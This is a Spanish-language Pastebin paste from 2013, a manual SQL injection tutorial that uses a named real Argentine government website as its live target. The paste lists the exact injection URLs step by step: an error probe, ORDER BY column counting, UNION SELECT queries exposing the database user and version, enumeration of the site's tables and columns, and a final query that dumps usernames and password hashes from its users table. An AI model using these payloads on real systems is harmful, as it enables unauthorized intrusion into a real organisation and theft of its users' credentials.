API tools faq
paste
Advertisement
Netikerty

SQL Manual Básica

Netikerty
Feb 13th, 2013
204
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.38 KB | None | 0 0
raw download clone embed print report
  1. SQL MANUAL SIMPLE
  2.  
  3. Ejemplo con una página vulnerable.
  4.  
  5. 1-
  6. http://www.renatea.gob.ar/novedad.php?id=126'
  7.  
  8. Aparecerá la siguiente alerta:
  9.  
  10. Warning: mysql_numrows() expects parameter 1 to be resource, boolean given in /web/renatea/renatea.gob.ar/www/novedad.php on line 8
  11. Error al seleccionar la novedad con id 126'
  12.  
  13.  
  14. 2-
  15. http://www.renatea.gob.ar/novedad.php?id=126 order by 10--
  16. http://www.renatea.gob.ar/novedad.php?id=126 order by 9--
  17. http://www.renatea.gob.ar/novedad.php?id=126 order by 7--
  18.  
  19. Bien hay siete tablas por donde podemos sacar la información
  20.  
  21. 3-
  22. http://www.renatea.gob.ar/novedad.php?id=-126 UNION SELECT 1,2,3,4,5,6,7--
  23. Acá se nos presentarán las tablas en mi caso escogeré la 3
  24.  
  25. 4-
  26. Ahora procedo a analizar la página para conocer ciertos datos:
  27.  
  28. http://www.renatea.gob.ar/novedad.php?id=-126 UNION SELECT 1,2,concat(database(),user(),version()),4,5,6,7--
  29. renatea :: db
  30. root@localhost :: local host
  31. 5.5.24-0ubuntu0.12.04.1:: db version
  32.  
  33. 5-
  34. Ahora procedemos a sacar el nombre de la columna:
  35.  
  36. http://www.renatea.gob.ar/novedad.php?id=-126 UNION SELECT 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
  37.  
  38. tablas: descargas,dump_delegaciones,exposiciones,prensa,slider,users
  39.  
  40. Escogeré la tabla que me interesa y en este caso es la de users
  41. Pero antes de proseguir cambiaremos la palabra users a hexadecimal para ello iremos a la siguiente página:
  42.  
  43. http://www.swingnote.com/tools/texttohex.php
  44.  
  45. users= 7573657273
  46.  
  47. 6-
  48. Continuamos ahora debemos sacar el nombre de la columna para ello hacemos lo siguiente:
  49.  
  50. http://www.renatea.gob.ar/novedad.php?id=-126 UNION SELECT 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=0x7573657273--
  51.  
  52. Al hacer esto nos muestra lo siguiente:
  53. id,name,password,admin,mail,empresa,direccion,telefono,logo,activo,id,name,password,admin,mail,empresa,direccion,telefono,logo,activo
  54.  
  55. 7-
  56. De los datos expuestos anteriormente tomaré la columna name y la columna password ubicandolos de la manera siguiente:
  57.  
  58. http://www.renatea.gob.ar/novedad.php?id=-126 UNION SELECT 1,2,group_concat(name,0x03,password,0x0a),4,5,6,7 from users--
  59.  
  60. 0x03 Hace espacio entre el nombre y el password
  61. 0x0a hace linea por linea
  62.  
  63. Al hacer esto nos mostrará los nombres y los hash de los passwords.
  64.  
  65. Espero se haya comprendido.
  66.  
  67. :D Saludos.
  68.  
  69. By Netikerty Asenet
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!